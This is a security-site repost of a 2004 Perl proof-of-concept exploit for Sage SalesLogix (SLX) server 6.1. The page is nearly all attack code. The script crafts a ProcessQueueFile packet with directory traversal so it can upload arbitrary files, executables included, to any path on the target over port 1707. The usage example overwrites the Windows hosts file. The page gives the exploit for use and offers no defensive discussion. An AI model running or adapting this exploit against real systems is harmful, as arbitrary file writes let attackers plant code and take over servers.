首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SLX server 6.1 Proof of concept exploit
来源:Agenda Security Services 作者:Carl 发布时间:2004-10-19  

SLX server 6.1 Proof of concept exploit

#!/usr/bin/perl
#
# Proof of concept exploit: Arbitrary file creation for SLX server 6.1
#
# Written by Carl Livitt, Agenda Security Services, June 2004.
#
# This exploit abuses the ProcessQueueFile command on SLX 6.1 (others?)
servers
# to create arbitrary files on the filesystem of the SLX server. By
using
# directory traversal, it is possible to escape from the Queue directory
and
# write anywhere on the SLX server's filesystem.
#

use IO::Socket;

print "slx_uploader - Uploads arbitrary files to Sage SalesLogix
servers.\n";
print "By Carl Livitt @ Agenda Security Services, June 2004\n\n";

if($#ARGV!=2) {
print "Syntax: $0 host filename_to_create file_to_upload\n\n";
print "Example:\n";
print " $0 10.0.0.100
\\\\winnt\\\\system32\\\\drivers\\\\etc\\\\hosts evil.txt\n\n";
print "The above example would upload the local file 'evil.txt'
to the SLX\n";
print "server on 10.0.0.100, overwriting the existing hosts
file.\n";
print "It is possible to upload binary files, e.g. executables,
with this exploit.\n\n";

exit(1);
} else {
$host=$ARGV[0];
$create_file=$ARGV[1];
$upload_file=$ARGV[2];
}

if((stat($upload_file))[7] > 4096) {
print "[*] Error! Files to be uploaded must be less than 4k in
size.\n\n";
exit(1);
}

print "[+] Building payload\n";
$contentLen=43 + length($create_file);
$exploit="\x00"x10 . chr($contentLen) . "\x00"x3 .
"ProcessQueueFile\x00" . "..\\"x8 . "$create_file" . "\x00"x6;

open(UPLOAD, '<', $upload_file) || die "Could not open local file
$upload_file\n";

while(($line=<UPLOAD>)) {
$exploit.=$line;
}

close(UPLOAD);

print "[+] Connecting to server $host:1707\n";
$sock=IO::Socket::INET->new("$host:1707") || do {print "[-] Could not
connect to server\n"; exit(1); };

print "[+] Sending exploit payload\n";
send($sock,$exploit,0);

print "[+] Waiting for response\n";
$sock->recv($data,1024,0);

if($data =~ /Received/) {
print "[+] Exploit successful\n";
} else {
print "[*] Exploit may not have worked.\n";
}

$sock->shutdown(2);



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AppleFileServer (AFS) 'FPLogin
·Microsoft Windows Metafile (.e
·3CServer v1.1 FTP Server Remot
·Microsoft IIS WebDAV XML Denia
·Mac OS X 'Finder/DS_Store' Arb
·Ability Server <= 2.34 Remo
·Setuid perl 'PerlIO_Debug()' L
·Apache<=1.3.31 mod_include
·Setuid perl 'PerlIO_Debug()' A
·ShixxNote 6.net, Remote Buffer
·ngIRCd 'Log_Resolver()' Remote
·creating a asp command shell u
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved